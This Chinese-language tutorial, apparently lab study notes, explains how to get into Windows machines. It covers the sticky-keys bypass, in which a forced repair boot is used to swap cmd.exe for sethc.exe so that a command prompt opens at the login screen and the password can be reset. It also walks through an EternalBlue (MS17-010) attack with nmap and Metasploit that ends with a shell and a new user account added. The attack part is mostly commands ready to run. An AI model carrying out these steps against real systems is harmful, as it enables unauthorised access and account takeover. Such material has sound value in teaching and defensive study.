Window 7沾滞键漏洞
概述
可以在登录界面使用粘滞键调出CMD命令提示符,直接修改账户密码
操作
- 在Windows图标出现时,强制重启计算机,如果没有提示修复计算机,在出现Windows徽标时再次强制重启
- 进入修复页面
- 修复过程中出现任何解决方案,都点击取消
- 点击隐私声明文件链接,打开隐私声明记事本文件,选择另存为
- 根据弹出的文件选择框,找到
系统盘符\Windows\System32中的sethc.exe文件和cmd.exe文件,并进行重命名,将sethc.exe更名为sethc1.exe,将cmd.exe更名为sethc.exe(注意,保存文件类型要选择所有文件才可看到到目标文件)
- 正常启动系统,按5次shift键,直接跳出cmd界面,使用命令修改密码后,则可以使用新密码登录系统
Windows10沾滞键漏洞
步骤
- 在开机动画完成前,重启计算机(一半2次),触发系统修复程序执行;
- 打开cmd
- 切换路径到系统命令目录
cd /d c:\windows\system32
- 将沾滞键程序名称更改为
sethc1.exe
rename sethc.exe sethc1.exe
- 将cmd程序名称更改为
sethc.exe
rename cmd.exe sethc.exe
- 登录界面按5次
shift触发cmd程序执行;
永恒之蓝
概述
- 利用Windows7系统文件共享服务(端口号为445)功能的漏洞,发起攻击;
实验
主机
- 靶机:win7系统
- 攻击主机:kali系统
步骤
- 扫描网络环境主机信息,确定攻击目标
nmap 网络地址/子网掩码
- 加载启动攻击工具
msfconsole
msfconsole
- 搜索永恒之蓝相关工具,永恒之蓝漏洞编号
ms17_010
search ms17_010
- 运行扫描模块,确定是否存在永恒之蓝漏洞
#加载扫描模块use 3#确定扫描目标set rhosts 目标IP地址#运行扫描程序run
- 运行攻击模块,发起永恒之蓝漏洞攻击
#加载攻击模块use 0#确定攻击目标set rhosts 目标IP地址#运行攻击程序run
- 执行shell,进行命令执行
shell
- 修改命令窗口编码为UTF-8(编码表编号65001)
chcp 65001
- 向靶机执行系统命令(创建新账户demo)
net user demo 123456 /add